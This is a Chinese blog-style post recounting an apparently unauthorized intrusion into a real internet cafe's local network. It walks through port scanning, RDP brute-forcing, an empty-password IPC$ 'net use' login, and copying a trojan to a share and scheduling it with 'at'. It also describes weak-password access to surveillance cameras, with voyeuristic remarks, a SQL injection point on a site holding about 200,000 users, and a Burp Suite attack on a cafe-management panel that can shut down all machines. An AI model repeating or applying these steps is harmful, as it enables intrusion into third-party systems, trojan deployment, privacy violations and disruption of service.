实战渗透网吧

首先我的内网IP是：

确定局域网的网段：192.168.0.1-192.168.0.254

使用的工具(啊D网络工具包：啊D网络工具包 扫描工具 V2.02 修正版 下载 安全自检)

进入：DTools2.02文件夹打开DTools.exe

进行对这些IP的端口扫描：

3389开放情况：

192.168.0.248 3389号端口打开

192.168.0.250 3389号端口打开

进行了3389端口爆破(工具：3389爆破工具 安全自检)

但是搞不定，没办法，大概扫描了下也没发现服务器的漏洞。

没办法，来扫描看下有哪些是开了共享的：

测试看了下就这个load目录共享了：

好，我们来试试IPC$入侵。

命令：

net use \\ip\ipc$ "pass" /user: "name"

这边我们是空口令直接使用：

net use \\192.168.0.241\ipc$ /user:"administrator"

想要上传个被控端却发现瘠薄没权限：

C:\Users\Administrator>copy 1.exe \\192.168.0.241\load

如果这样是可以上传的，我们就可以让他定时运行这个被控端，就可以上线了！！命令：

at \\192.168.0.241 时:分 1.exe

我从服务端入侵开始转到了WEB层的渗透了，扫描80、8080、81端口：

192.168.0.12

192.168.0.200

192.168.0.239

192.168.0.247

192.168.0.208

192.168.0.207

192.168.0.202

192.168.0.201

192.168.0.203

192.168.0.205

192.168.0.254

192.168.0.206

192.168.0.204

192.168.0.245:8080

192.168.0.246:8080

192.168.0.250:8080

192.168.0.247:81

经过人工检测发现这几个可以利用的站点：

1.监控管理 ：http://192.168.0.239/

(可以看妹子、还可以嘿嘿嘿) 思路：admin/adminxr 弱口令进入

2.网吧在线棋牌 ： http://192.168.0.247/

后期发现开着81端口就是管理后台：

前台一枚注入：/NewsList.aspx?id=1(时间问题没截图)

直接进后台：

(亲测数据量 20多万用户 未脱裤)

3.pubwin 2015 web管理 : http://192.168.0.245:8080/NetCafe/

直接Burpsuite怼起：

后台就进来了。(可以导致整个网吧电脑关机)

后来，我截图发微信给网咖老板，老板来亲自道歉！点到为止。

4.控制个人电脑：

...可以进行嘿嘿嘿，不过还是要遵守法律法规哦